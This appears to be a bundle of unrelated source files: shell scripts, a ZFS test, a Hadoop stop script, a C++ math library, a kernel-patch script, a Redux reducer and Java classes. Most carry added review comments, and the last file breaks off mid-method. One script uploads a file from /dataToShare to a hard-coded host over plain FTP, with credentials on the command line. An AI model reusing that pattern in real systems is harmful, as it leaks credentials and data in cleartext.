if [ -d /var/www/html/farm/images/ ] ; then
mkdir -p /var/www/html/farm/images/${image_prefix}-${time}/ || true
echo "Copying: *.tar to server: images/${image_prefix}-${time}/"
cp -v ${DIR}/deploy/gift_wrap_final_images.sh /var/www/html/farm/images/${image_prefix}-${time}/gift_wrap_final_images.sh || true
chmod +x /var/www/html/farm/images/${image_prefix}-${time}/gift_wrap_final_images.sh || true
# Make the published tree owned by the web/cache service account.
sudo chown -R apt-cacher-ng:apt-cacher-ng /var/www/html/farm/images/${image_prefix}-${time}/ || true
fi
|
#!/bin/sh
# Generate MAQL DDL for one dataset with the GoodData CL tool ($GDCL).
#
# Usage: generate_maql.sh <dataset> [<project> [<update_flag>]]
#   <dataset>      basename of the CSV in $DATA_DIR and config in $MODEL_DIR
#   <project>      GoodData project id (defaults to contents of tmp/pid)
#   <update_flag>  any non-empty value switches to GenerateUpdateMaql
set -e
. `dirname "$0"`/common.sh
DATASET="$1"
CSV_FILE="$DATA_DIR/${DATASET}.csv"
CONFIG_FILE="$MODEL_DIR/${DATASET}.config.xml"
PROJECT="${2:-$(cat tmp/pid)}"
UPDATE="${3:-}"
# Bug fix: the original tested [ ! "$CONFIG_FILE" ], which can never be true
# because CONFIG_FILE is assembled from literals just above. Validate the
# actual user input instead so the usage message fires on a missing argument.
if [ -z "$DATASET" ] ; then
die "Usage: $0 <dataset> [<project> [<update_flag>]]"
fi
# Quoted -n test: the original's unquoted [ $UPDATE ] would break (or
# mis-evaluate) if the flag contained spaces or test operators.
if [ -n "$UPDATE" ] ; then
command='GenerateUpdateMaql'
else
command='GenerateMaql'
fi
# Build the CL script: open the project, describe the CSV, emit MAQL.
script="
OpenProject(id = \"$PROJECT\");
UseCsv(hasHeader=\"true\", csvDataFile=\"$CSV_FILE\", configFile=\"$CONFIG_FILE\");
$command(maqlFile=\"tmp/${DATASET}.maql\"); "
echo "$script"
"$GDCL" -e "$script"
|
#!/bin/sh
# Upload one file from /dataToShare to a fixed FTP server.
# Args: $1 = FTP user, $2 = FTP password, $3 = file to upload.
# NOTE(review): credentials travel on the command line and over plain FTP
# (unencrypted) — acceptable only on a trusted/lab network; confirm intent.
HOST="172.16.238.15"
USER="$1"
PASS="$2"
FILE="$3"
#Choose random file
#FILE=$(ls /dataToShare/ | sort -R | tail -1)
cd /dataToShare
echo "CONNECTING ..."
# -n disables auto-login so credentials can be fed via 'quote' commands;
# -p uses passive mode (works through NAT/firewalls).
ftp -p -n $HOST <<END_SCRIPT
quote USER $USER
quote PASS $PASS
pwd
ls
bin
verbose
prompt
put $FILE newfile
quit
END_SCRIPT
exit 0
|
#!/usr/local/bin/ksh93 -p
#
# CDDL HEADER START
#
# The contents of this file are subject to the terms of the
# Common Development and Distribution License (the "License").
# You may not use this file except in compliance with the License.
#
# You can obtain a copy of the license at usr/src/OPENSOLARIS.LICENSE
# or http://www.opensolaris.org/os/licensing.
# See the License for the specific language governing permissions
# and limitations under the License.
#
# When distributing Covered Code, include this CDDL HEADER in each
# file and include the License file at usr/src/OPENSOLARIS.LICENSE.
# If applicable, add the following below this CDDL HEADER, with the
# fields enclosed by brackets "[]" replaced with your own identifying
# information: Portions Copyright [yyyy] [name of copyright owner]
#
# CDDL HEADER END
#
# $FreeBSD$
#
# Copyright 2007 Sun Microsystems, Inc. All rights reserved.
# Use is subject to license terms.
#
# ident "@(#)atime_001_pos.ksh 1.2 07/01/09 SMI"
#
. $STF_SUITE/include/libtest.kshlib
. $STF_SUITE/tests/atime/atime_common.kshlib
################################################################################
#
# __stc_assertion_start
#
# ID: atime_001_pos
#
# DESCRIPTION:
# When atime=on, verify the access time for files is updated when read. It
# is available to fs and clone. To snapshot, it is unavailable.
#
# STRATEGY:
# 1. Create pool and fs.
# 2. Create '$TESTFILE' for fs.
# 3. Create snapshot and clone.
# 4. Setting atime=on on datasets except snapshot, and read '$TESTFILE'.
# 5. Expect the access time is updated on datasets except snapshot.
#
# TESTABILITY: explicit
#
# TEST_AUTOMATION_LEVEL: automated
#
# CODING_STATUS: COMPLETED (2005-07-11)
#
# __stc_assertion_end
#
################################################################################
# Runnable both globally and locally per the STF test framework.
verify_runnable "both"
log_assert "Setting atime=on, the access time for files is updated when read."
log_onexit cleanup
#
# Create $TESTFILE, snapshot and clone.
#
setup_snap_clone
# Exercise fs, clone, and snapshot. atime can be set (and must update) on
# the fs and clone; a snapshot is read-only, so its atime must NOT change.
for dst in $TESTPOOL/$TESTFS $TESTPOOL/$TESTCLONE $TESTPOOL/$TESTFS@$TESTSNAP
do
typeset mtpt=$(get_prop mountpoint $dst)
if [[ $dst == $TESTPOOL/$TESTFS@$TESTSNAP ]]; then
# Snapshots have no 'mountpoint' property; resolve the .zfs path instead.
mtpt=$(snapshot_mountpoint $dst)
log_mustnot check_atime_updated $mtpt/$TESTFILE
else
log_must $ZFS set atime=on $dst
log_must check_atime_updated $mtpt/$TESTFILE
fi
done
log_pass "Verify the property atime=on passed."
|
#!/bin/bash
#
# (C) Copyright 2013 The CloudDOE Project and others.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Contributors:
# Wei-Chun Chung (wcchung@iis.sinica.edu.tw)
# Yu-Chun Wang (zxaustin@iis.sinica.edu.tw)
#
# CloudDOE Project:
# http://clouddoe.iis.sinica.edu.tw/
#
# Stop a running Hadoop cluster given its installation directory ($1).
# Step numbers run backwards (4.3 then 4.2) because teardown mirrors the
# corresponding start script's steps in reverse order.
if [ $# -lt 1 ]; then
  echo "Using:" "$0" "{HadoopDir}"; exit
else
  # Bug fix: "$1" is now quoted throughout so an install path containing
  # spaces no longer breaks the tests or the script invocations below.
  if [ ! -d "$1" ]; then
    echo "---- [ERROR 4] $1 does not exist! ----"; exit
  elif [ ! -x "$1" ]; then
    echo "---- [ERROR 4] $1 permission error! ----"; exit
  fi
  echo "---- [4] Stop Hadoop Cloud ----";
  echo "---- [4.3] Stoping MapReduce/YARN ... ----"
  # bin/yarn exists only in Hadoop 2.x; use its sbin/ scripts, otherwise
  # fall back to the Hadoop 1.x bin/ equivalents.
  if [ -e "$1"/bin/yarn ]; then
    "$1"/sbin/stop-yarn.sh
  else
    "$1"/bin/stop-mapred.sh
  fi
  echo "---- [4.2] Stoping DFS... ----"
  if [ -e "$1"/bin/yarn ]; then
    "$1"/sbin/stop-dfs.sh
  else
    "$1"/bin/stop-dfs.sh
  fi
  # There is no 4.1 restore step
fi
# vim: ai ts=2 sw=2 et sts=2 ft=sh
|
/*
* Copyright 2016-2017 <NAME>
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
* File lib/math.cpp
*
*/
#include <random>
#include <limits>
#include "sm/lib/stdlib.h"
namespace sm{
    // Mathematical constants (float_t / integer_t come from the sm core headers).
    constexpr float_t PI = 3.141592653589793;
    constexpr float_t DOUBLE_PI = 3.141592653589793*2;
    constexpr float_t E = 2.718281828459045;

    namespace lib{
        namespace random {
            // Shared PRNG state: one Mersenne Twister seeded once from the
            // system entropy source, plus a uniform [0,1) real distribution.
            std::random_device random_device;
            std::mt19937 mt(random_device());
            std::uniform_real_distribution<> urd(0, 1);
        }

        // Native "math" box: exposes constants and <cmath> wrappers to scripts.
        smLibDecl(math){
            smInitBox

            smVar(PI, makeFloat(PI));
            smVar(DOUBLE_PI, makeFloat(DOUBLE_PI));
            smVar(E, makeFloat(E));
            smVar(NAN, makeFloat(NAN));
            smVar(INF, makeFloat(INFINITY)); // added missing ';' for consistency
            smVar(MAX_INT, makeInteger(std::numeric_limits<integer_t>::max()));
            smVar(MIN_INT, makeInteger(std::numeric_limits<integer_t>::min()));

            // rand(): uniform float in [0, 1).
            smFunc(rand, smLambda {
                return makeFloat(random::urd(random::mt));
            })

            // rand_int(min, max): uniform integer in [min, max], inclusive.
            smFunc(rand_int, smLambda {
                if(args.size() < 2 || args[0]->type != ObjectType::INTEGER
                        || args[1]->type != ObjectType::INTEGER)
                    return Object();
                integer_t min = args[0]->i, max = args[1]->i;
                if(max < min)
                    return Object();
                else if(max == min)
                    return makeInteger(max);
                // Bug fix: the original scaled urd() in [0,1) by (max-min) and
                // truncated, so 'max' itself could never be drawn (despite the
                // max==min branch implying an inclusive range) and the spread
                // was not exactly uniform. uniform_int_distribution is both
                // inclusive and exact.
                std::uniform_int_distribution<integer_t> dist(min, max);
                return makeInteger(dist(random::mt));
            })

            // Bind a one-argument <cmath> function: accepts INTEGER or FLOAT,
            // returns FLOAT, or a null Object on any other input.
            // Renamed from __SmBind/__SmSnBind: identifiers containing a
            // double underscore are reserved to the implementation in C++.
            #define SM_MATH_BIND(fnName, realName) \
            smFunc(fnName, smLambda { \
                if(args.empty()) \
                    return Object(); \
                else if(args[0]->type == ObjectType::INTEGER) \
                    return makeFloat(std::realName(static_cast<float_t>(args[0]->i))); \
                else if(args[0]->type == ObjectType::FLOAT) \
                    return makeFloat(std::realName(args[0]->f)); \
                return Object(); \
            })
            #define SM_MATH_BIND1(fnName) SM_MATH_BIND(fnName, fnName)

            SM_MATH_BIND1(cos);
            SM_MATH_BIND1(sin);
            SM_MATH_BIND1(tan);
            SM_MATH_BIND1(acos);
            SM_MATH_BIND1(asin);
            SM_MATH_BIND1(atan);
            SM_MATH_BIND1(cosh);
            SM_MATH_BIND1(sinh);
            SM_MATH_BIND1(tanh);
            SM_MATH_BIND1(acosh);
            SM_MATH_BIND1(asinh);
            SM_MATH_BIND1(atanh);
            SM_MATH_BIND1(exp);
            SM_MATH_BIND1(exp2);
            SM_MATH_BIND1(log);
            SM_MATH_BIND1(log2);
            SM_MATH_BIND1(log10);
            SM_MATH_BIND1(sqrt);
            SM_MATH_BIND1(cbrt);
            SM_MATH_BIND1(ceil);
            SM_MATH_BIND1(floor);
            SM_MATH_BIND1(round);
            SM_MATH_BIND1(trunc);
            #undef SM_MATH_BIND
            #undef SM_MATH_BIND1

            // atan2(x, y): two-argument arctangent.
            smFunc(atan2, smLambda {
                // Bug fix: the original checked only args.empty() and then
                // read args[1] unconditionally — out-of-bounds with one arg.
                if(args.size() < 2)
                    return Object();
                float_t x, y;
                if(args[0]->type == ObjectType::INTEGER)
                    x = args[0]->i;
                else if(args[0]->type == ObjectType::FLOAT)
                    x = args[0]->f;
                else return Object();
                if(args[1]->type == ObjectType::INTEGER)
                    y = args[1]->i;
                else if(args[1]->type == ObjectType::FLOAT)
                    y = args[1]->f;
                else return Object();
                return makeFloat(std::atan2(x, y));
            })

            // frexp(x): decompose x into [significand, exponent].
            smFunc(frexp, smLambda {
                if(args.empty())
                    return Object();
                float_t signif;
                int exp;
                if(args[0]->type == ObjectType::INTEGER)
                    signif = std::frexp(static_cast<float_t>(args[0]->i), &exp);
                else if(args[0]->type == ObjectType::FLOAT)
                    signif = std::frexp(args[0]->f, &exp);
                else
                    return Object();
                return makeList(intp, RootObjectVec_t {makeFloat(signif), makeInteger(exp)});
            })

            // pow(x, y): x raised to y.
            smFunc(pow, smLambda {
                if(args.size() < 2) // bug fix: args[1] is read below
                    return Object();
                float_t x, y;
                if(args[0]->type == ObjectType::INTEGER)
                    x = args[0]->i;
                else if(args[0]->type == ObjectType::FLOAT)
                    x = args[0]->f;
                else return Object();
                if(args[1]->type == ObjectType::INTEGER)
                    y = args[1]->i;
                else if(args[1]->type == ObjectType::FLOAT)
                    y = args[1]->f;
                else return Object();
                return makeFloat(std::pow(x, y));
            })

            // hypot(x, y): sqrt(x*x + y*y) without intermediate overflow.
            smFunc(hypot, smLambda {
                if(args.size() < 2) // bug fix: args[1] is read below
                    return Object();
                float_t x, y;
                if(args[0]->type == ObjectType::INTEGER)
                    x = args[0]->i;
                else if(args[0]->type == ObjectType::FLOAT)
                    x = args[0]->f;
                else return Object();
                if(args[1]->type == ObjectType::INTEGER)
                    y = args[1]->i;
                else if(args[1]->type == ObjectType::FLOAT)
                    y = args[1]->f;
                else return Object();
                return makeFloat(std::hypot(x, y));
            })

            // round_int(x): round to nearest, returned as an integer.
            smFunc(round_int, smLambda {
                if(args.empty())
                    return Object();
                else if(args[0]->type == ObjectType::INTEGER)
                    return makeInteger(std::lround(static_cast<float_t>(args[0]->i)));
                else if(args[0]->type == ObjectType::FLOAT)
                    return makeInteger(std::lround(args[0]->f));
                return Object();
            })

            // is_nan(x) / is_inf(x): false for anything that is not a FLOAT.
            smFunc(is_nan, smLambda {
                if(args.empty() || args[0]->type != ObjectType::FLOAT)
                    return makeFalse();
                return makeBool(std::isnan(args[0]->f));
            })
            smFunc(is_inf, smLambda {
                if(args.empty() || args[0]->type != ObjectType::FLOAT)
                    return makeFalse();
                return makeBool(std::isinf(args[0]->f));
            })

            // deg(x): radians -> degrees.
            smFunc(deg, smLambda {
                if(args.empty()) // bug fix: original read args[0] unchecked
                    return Object();
                if(args[0]->type == ObjectType::FLOAT)
                    return makeFloat(args[0]->f / DOUBLE_PI * 360.f);
                else if(args[0]->type == ObjectType::INTEGER)
                    return makeFloat(args[0]->i / DOUBLE_PI * 360.f);
                return Object();
            })

            // rad(x): degrees -> radians.
            smFunc(rad, smLambda {
                if(args.empty()) // bug fix: original read args[0] unchecked
                    return Object();
                if(args[0]->type == ObjectType::FLOAT)
                    return makeFloat(args[0]->f / 360.f * DOUBLE_PI);
                else if(args[0]->type == ObjectType::INTEGER)
                    return makeFloat(args[0]->i / 360.f * DOUBLE_PI);
                return Object();
            })

            smReturnBox
        }
    }
}
|
#!/bin/sh
# CYBERWATCH SAS - 2017
#
# Security fix for USN-2929-2
#
# Security announcement date: 2016-03-14 00:00:00 UTC
# Script generation date: 2017-01-01 21:05:16 UTC
#
# Operating System: Ubuntu 12.04 LTS
# Architecture: x86_64
#
# Vulnerable packages fix on version:
# - linux-image-3.13.0-83-generic-lpae:3.13.0-83.127~precise1
# - linux-image-3.13.0-83-generic:3.13.0-83.127~precise1
# - linux-image-3.13.0-83-generic-lpae:3.13.0-83.127~precise1
# - linux-image-3.13.0-83-generic:3.13.0-83.127~precise1
#
# Last versions recommanded by security team:
# - linux-image-3.13.0-83-generic-lpae:3.13.0-83.127~precise1
# - linux-image-3.13.0-83-generic:3.13.0-83.127~precise1
# - linux-image-3.13.0-83-generic-lpae:3.13.0-83.127~precise1
# - linux-image-3.13.0-83-generic:3.13.0-83.127~precise1
#
# CVE List:
# - CVE-2016-3134
# - CVE-2013-4312
# - CVE-2015-7566
# - CVE-2015-7833
# - CVE-2016-0723
# - CVE-2016-2384
# - CVE-2016-2543
# - CVE-2016-2544
# - CVE-2016-2545
# - CVE-2016-2546
# - CVE-2016-2547
# - CVE-2016-2548
# - CVE-2016-2549
# - CVE-2016-2782
# - CVE-2016-3134
# - CVE-2013-4312
# - CVE-2015-7566
# - CVE-2015-7833
# - CVE-2016-0723
# - CVE-2016-2384
# - CVE-2016-2543
# - CVE-2016-2544
# - CVE-2016-2545
# - CVE-2016-2546
# - CVE-2016-2547
# - CVE-2016-2548
# - CVE-2016-2549
# - CVE-2016-2782
#
# More details:
# - https://www.cyberwatch.fr/vulnerabilites
#
# Licence: Released under The MIT License (MIT), See LICENSE FILE
# The generated package list contained each entry twice; one upgrade command
# per package is sufficient (and apt-get is idempotent anyway).
sudo apt-get install --only-upgrade linux-image-3.13.0-83-generic-lpae=3.13.0-83.127~precise1 -y
sudo apt-get install --only-upgrade linux-image-3.13.0-83-generic=3.13.0-83.127~precise1 -y
|
# Prompt for a single keystroke and run the guarded action only on y/Y.
# NOTE(review): this is a template fragment — the literal '...' below is a
# placeholder, not valid shell; replace it with the real command(s) before use.
read -p "?" -n 1 -r
if [[ $REPLY =~ ^[Yy]$ ]]
then
...
fi
|
<reponame>josebright/tulip_foundation_website
import { Press } from '../constant';
// Initial shape of the press slice: request-in-flight flag, the fetched
// press items, and optional message/error payloads.
const initialState = {
  loading: false,
  Press: [],
  message: null,
  error: null,
};

/**
 * Reducer for press-release data. Tracks the request lifecycle:
 * REQUEST raises the loading flag, SUCCESS stores the payload as `Press`,
 * FAILED stores the payload as `error`. Unknown actions pass state through.
 */
const PressReducer = (state = initialState, action) => {
  if (action.type === Press.PRESS_REQUEST) {
    return { ...state, loading: true };
  }
  if (action.type === Press.PRESS_SUCCESS) {
    return { ...state, loading: false, Press: action.payload };
  }
  if (action.type === Press.PRESS_FAILED) {
    return { ...state, loading: false, error: action.payload };
  }
  return state;
};

export default PressReducer;
|
<reponame>groupon/nakala
/*
Copyright (c) 2013, Groupon, Inc.
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
Neither the name of GROUPON nor the names of its contributors may be
used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
package com.groupon.nakala.sentiment;
import org.apache.lucene.search.spans.SpanQuery;
import java.io.IOException;
import java.util.*;
import java.util.regex.Pattern;
/**
* @author <EMAIL>
*/
/**
 * Review-domain vocabulary: loads span queries for one named topic (e.g.
 * "family", "spa") from vocabulary files and exposes cached union queries
 * for the CONTENTS and TITLE index fields.
 */
public final class VocabularyReview extends AbstractVocabulary {
    // One constant per supported review topic / vocabulary file name.
    public static final String AMBIANCE = "ambiance";
    public static final String AQUARIUM = "aquarium";
    public static final String BALCONY = "balcony";
    public static final String BALLET = "ballet";
    public static final String BASEBALL = "baseball";
    public static final String BASE = "base";
    public static final String BEACH = "beach";
    public static final String BIKE = "bike";
    public static final String BOWL = "bowl";
    public static final String CLEANLINESS = "cleanliness";
    public static final String CLOTHING = "clothing";
    public static final String DIVING = "diving";
    public static final String DYNAMICFEAT = "dynamicfeat";
    public static final String FAMILY = "family";
    public static final String FOOD = "food";
    public static final String GIRLSGETAWAY = "girlsgetaway";
    public static final String GOLF = "golf";
    public static final String HIKE = "hike";
    public static final String JEWELRY = "jewelry";
    public static final String LOBBY = "lobby";
    public static final String LOCATION_AIRPORT = "location_airport";
    public static final String LOCATION = "location";
    public static final String LOUNGE = "lounge";
    public static final String LUXURY = "luxury";
    public static final String MARKET = "market";
    public static final String MUSEUM = "museum";
    public static final String NIGHTLIFE = "nightlife";
    public static final String OCEAN = "ocean";
    public static final String OVERALL = "overall";
    public static final String PARKING = "parking";
    public static final String PET = "pet";
    public static final String PLAYGROUND = "playground";
    public static final String QUIET = "quiet";
    public static final String ROMANCE = "romance";
    public static final String ROOMCOMFORTABLE = "roomcomfortable";
    public static final String ROOMSERVICE = "roomservice";
    public static final String ROOMSIZE = "room_size";
    public static final String SIGHTSEEING = "sightseeing";
    public static final String SKI = "ski";
    public static final String SPA = "spa";
    public static final String STAFF = "staff";
    public static final String SWIM = "swim";
    public static final String THEMEPARK = "themepark";
    public static final String TRANSPORTATION = "transportation";
    public static final String VALUE = "value";
    public static final String VIEW = "view";
    public static final String WATERSPORTS = "watersports";
    public static final String WOMALONE = "womalone";
    public static final String WOULDRETURN = "would_return";
    public static final String ZOO = "zoo";

    // Section labels recognized inside each vocabulary file.
    private static final String FEATURES = "FEATURES";
    private static final String PROHIBITED = "PROHIBITED";
    private static final String PLUS_ONE = "PLUS_ONE";
    private static final String PLUS_HALF = "PLUS_HALF";
    private static final String MINUS_HALF = "MINUS_HALF";
    private static final String MINUS_ONE = "MINUS_ONE";

    // Lazily-built union queries, cached per field/label combination.
    private SpanQuery featuresSQ, prohibitedSQ, plusOneSQ, minusOneSQ;
    private SpanQuery featuresTitleSQ, prohibitedTitleSQ, plusOneTitleSQ,
            minusOneTitleSQ;

    private VocabularyReview(String vocabName) {
        super(vocabName);
    }

    /**
     * Loads the named vocabulary from the "review/" subdirectory and
     * prepares per-label query sets for both CONTENTS and TITLE fields.
     *
     * @param vocabName one of the topic constants above
     * @throws IOException if a vocabulary file cannot be read
     */
    public static VocabularyReview newInstance(String vocabName) throws IOException {
        VocabularyReview vr = new VocabularyReview(vocabName);
        vr.vocabPath = vr.vocabPath + "review/";
        // NOTE(review): labels omits PLUS_HALF/MINUS_HALF while the query
        // maps and 'fields' include them — looks deliberate but confirm.
        vr.labels = Collections.synchronizedSet(new HashSet<String>());
        vr.labels.add(FEATURES);
        vr.labels.add(PROHIBITED);
        vr.labels.add(PLUS_ONE);
        vr.labels.add(MINUS_ONE);
        vr.wordsOfInterest = Collections.synchronizedSet(new HashSet<Pattern>());
        vr.queryMapContents = Collections.synchronizedMap(new HashMap<String, Set<SpanQuery>>());
        vr.queryMapContents.put(FEATURES, new HashSet<SpanQuery>());
        vr.queryMapContents.put(PROHIBITED, new HashSet<SpanQuery>());
        vr.queryMapContents.put(PLUS_ONE, new HashSet<SpanQuery>());
        vr.queryMapContents.put(PLUS_HALF, new HashSet<SpanQuery>());
        vr.queryMapContents.put(MINUS_ONE, new HashSet<SpanQuery>());
        vr.queryMapContents.put(MINUS_HALF, new HashSet<SpanQuery>());
        vr.queryMapTitle = Collections.synchronizedMap(new HashMap<String, Set<SpanQuery>>());
        vr.queryMapTitle.put(FEATURES, new HashSet<SpanQuery>());
        vr.queryMapTitle.put(PROHIBITED, new HashSet<SpanQuery>());
        vr.queryMapTitle.put(PLUS_ONE, new HashSet<SpanQuery>());
        vr.queryMapTitle.put(PLUS_HALF, new HashSet<SpanQuery>());
        vr.queryMapTitle.put(MINUS_ONE, new HashSet<SpanQuery>());
        vr.queryMapTitle.put(MINUS_HALF, new HashSet<SpanQuery>());
        Set<String> fields = Collections.synchronizedSet(new HashSet<String>());
        fields.add(FEATURES);
        fields.add(PROHIBITED);
        fields.add(PLUS_ONE);
        fields.add(PLUS_HALF);
        fields.add(MINUS_ONE);
        fields.add(MINUS_HALF);
        // Populate both query maps from the same vocabulary file, once per
        // target index field.
        vr.readVocabFile(vr.domain, fields, null, ExcerptIndexer.CONTENTS, vr.queryMapContents);
        vr.readVocabFile(vr.domain, fields, null, ExcerptIndexer.TITLE, vr.queryMapTitle);
        return vr;
    }

    /** Human-readable dump of the CONTENTS queries, grouped by label. */
    @Override
    public String toString() {
        // StringBuilder instead of StringBuffer: this is a local, single
        // threaded buffer, so the synchronized variant buys nothing.
        StringBuilder sb = new StringBuilder();
        String[] labelList = {FEATURES, PROHIBITED, PLUS_ONE, PLUS_HALF,
                MINUS_HALF, MINUS_ONE};
        for (String l : labelList) {
            if (queryMapContents.get(l).isEmpty()) {
                continue;
            }
            List<SpanQuery> entries = Collections.synchronizedList(
                    new ArrayList<SpanQuery>(queryMapContents.get(l)));
            sb.append(l).append('\n');
            for (SpanQuery e : entries) {
                sb.append(" ").append(e.toString()).append('\n');
            }
            sb.append('\n');
        }
        return sb.toString();
    }

    /**
     * Returns the cached query if present, otherwise builds the union query
     * for the given label from the given field map.
     * Bug fix: the original built a fresh query but never stored it back, so
     * the cache fields stayed null forever and every getter rebuilt its
     * query on each call. Getters now assign the result to their field.
     */
    private SpanQuery getQuery(SpanQuery cached, Map<String, Set<SpanQuery>> queryMap, String field) {
        if (cached == null) {
            cached = VocabUtils.buildQueryFromSpanQuerySet(queryMap.get(field));
        }
        return cached;
    }

    public SpanQuery getFeatures() {
        featuresSQ = getQuery(featuresSQ, queryMapContents, FEATURES);
        return featuresSQ;
    }

    public SpanQuery getProhibited() {
        prohibitedSQ = getQuery(prohibitedSQ, queryMapContents, PROHIBITED);
        return prohibitedSQ;
    }

    public SpanQuery getAttitudePlusOne() {
        plusOneSQ = getQuery(plusOneSQ, queryMapContents, PLUS_ONE);
        return plusOneSQ;
    }

    public SpanQuery getAttitudeMinusOne() {
        minusOneSQ = getQuery(minusOneSQ, queryMapContents, MINUS_ONE);
        return minusOneSQ;
    }

    public SpanQuery getFeaturesTitle() {
        featuresTitleSQ = getQuery(featuresTitleSQ, queryMapTitle, FEATURES);
        return featuresTitleSQ;
    }

    public SpanQuery getProhibitedTitle() {
        prohibitedTitleSQ = getQuery(prohibitedTitleSQ, queryMapTitle, PROHIBITED);
        return prohibitedTitleSQ;
    }

    public SpanQuery getAttitudePlusOneTitle() {
        plusOneTitleSQ = getQuery(plusOneTitleSQ, queryMapTitle, PLUS_ONE);
        return plusOneTitleSQ;
    }

    public SpanQuery getAttitudeMinusOneTitle() {
        minusOneTitleSQ = getQuery(minusOneTitleSQ, queryMapTitle, MINUS_ONE);
        return minusOneTitleSQ;
    }

    /** Manual smoke test: dump a few vocabularies to stdout. */
    public static void main(String[] args) throws Exception {
        VocabularyReview vocab = VocabularyReview
                .newInstance(VocabularyReview.FAMILY);
        System.out.println("==========\nfamily\n==========");
        System.out.print(vocab.toString());
        vocab = VocabularyReview.newInstance(VocabularyReview.AMBIANCE);
        System.out.println("\n\n==========\nambiance\n==========");
        System.out.print(vocab.toString());
        vocab = VocabularyReview.newInstance(VocabularyReview.NIGHTLIFE);
        System.out.println("\n\n==========\nnightlife\n==========");
        System.out.print(vocab.toString());
        vocab = VocabularyReview.newInstance(VocabularyReview.SPA);
        System.out.println("\n\n==========\nspa\n==========");
        System.out.print(vocab.toString());
    }
}
|
package org.vertx.java.core.cluster;
import org.jboss.netty.util.CharsetUtil;
import org.vertx.java.core.buffer.Buffer;
import org.vertx.java.core.logging.Logger;
import org.vertx.java.core.net.NetSocket;
import org.vertx.java.core.net.ServerID;
/**
* <p>Represents a message sent on the event bus.</p>
*
* @author <a href="http://tfox.org"><NAME></a>
*/
public class Message extends Sendable {
private static final Logger log = Logger.getLogger(Message.class);
/**
* The unique id of the message - this is filled in by the event bus when the message is sent
*/
public String messageID;
/**
* The address where the message is being sent
*/
public String address;
/**
* The body (payload) of the message
*/
public final Buffer body;
// Origin server, filled in during deserialization; used for acks.
ServerID sender;
// True when the sender asked for a receipt (acknowledge() is then a no-op
// unless this is set and 'bus' is attached).
boolean requiresAck;
EventBus bus;
/**
* Create a new Message
* @param address The address to send the message to
* @param body
*/
public Message(String address, Buffer body) {
this.address = address;
this.body = body;
}
/**
* Acknowledge receipt of this message. If the message was sent specifying a receipt handler, that handler will be
* called when all receivers have called acknowledge. If the message wasn't sent specifying a receipt handler
* this method does nothing.
*/
public void acknowledge() {
if (bus != null && requiresAck) {
bus.acknowledge(sender, messageID);
}
}
// Deserialize from the wire format written by write() below. Layout after
// the leading type byte (pos starts at 1, skipping it):
//   [int len][messageID bytes][int len][address bytes]
//   [int senderPort][int len][senderHost bytes][byte requiresAck]
//   [int len][body bytes]
// All strings are UTF-8; all ints are 4 bytes.
Message(Buffer readBuff) {
// TODO Meh. This could be improved
int pos = 1;
int messageIDLength = readBuff.getInt(pos);
pos += 4;
byte[] messageIDBytes = readBuff.getBytes(pos, pos + messageIDLength);
pos += messageIDLength;
messageID = new String(messageIDBytes, CharsetUtil.UTF_8);
int addressLength = readBuff.getInt(pos);
pos += 4;
byte[] addressBytes = readBuff.getBytes(pos, pos + addressLength);
pos += addressLength;
address = new String(addressBytes, CharsetUtil.UTF_8);
int port = readBuff.getInt(pos);
pos += 4;
int hostLength = readBuff.getInt(pos);
pos += 4;
byte[] hostBytes = readBuff.getBytes(pos, pos + hostLength);
pos += hostLength;
String host = new String(hostBytes, CharsetUtil.UTF_8);
sender = new ServerID(port, host);
byte bra = readBuff.getByte(pos);
requiresAck = bra == (byte)1;
pos += 1;
int buffLength = readBuff.getInt(pos);
pos += 4;
byte[] payload = readBuff.getBytes(pos, pos + buffLength);
body = Buffer.create(payload);
}
// Serialize to the socket. A 4-byte total-length prefix is written as 0
// first and patched in at the end (setInt) once the real size is known,
// so the reader can frame the message. The format must mirror the
// Message(Buffer) constructor above exactly.
void write(NetSocket socket) {
// Capacity hint only: String.length() counts chars, not UTF-8 bytes,
// so this may under-estimate for non-ASCII — presumably the Buffer
// grows as needed; confirm Buffer.create(int) semantics.
int length = 1 + 6 * 4 + address.length() + 1 + body.length() + messageID.length() + sender.host.length();
Buffer totBuff = Buffer.create(length);
totBuff.appendInt(0);
totBuff.appendByte(Sendable.TYPE_MESSAGE);
writeString(totBuff, messageID);
writeString(totBuff, address);
totBuff.appendInt(sender.port);
writeString(totBuff, sender.host);
totBuff.appendByte((byte)(requiresAck ? 1 : 0));
totBuff.appendInt(body.length());
